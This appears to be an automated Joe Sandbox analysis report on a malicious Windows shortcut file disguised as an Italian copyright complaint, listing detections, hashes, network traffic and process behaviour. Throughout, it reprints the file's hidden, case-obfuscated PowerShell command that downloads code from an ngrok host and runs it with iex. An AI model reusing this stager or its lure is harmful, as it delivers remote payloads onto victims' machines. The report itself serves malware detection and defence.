Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk

Overview

General Information

Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
Analysis ID:1578153
MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
SHA1:1376441bc8171553125dac0415240a81859ee8f7
SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
PowerShell case anomaly found
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • cmd.exe (PID: 5676 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4176 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5676, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 4176, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 5676, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5676, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 4176, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 39%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 3.6.115.64:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 3.6.115.64 3.6.115.64
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: 5awvoe1sr8b6b5g9cfxz.ngrok.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Thu, 19 Dec 2024 09:38:54 GMTContent-Length: 67
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkString found in binary or memory: https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownHTTPS traffic detected: 3.6.115.64:443 -> 192.168.2.6:49709 version: TLS 1.2

System Summary

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: classification engineClassification label: mal76.winLNK@4/3@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd5wpah0.xrj.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 39%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4266Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5597Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep count: 4266 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep count: 5597 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3300Thread sleep time: -13835058055282155s >= -30000sJump to behavior
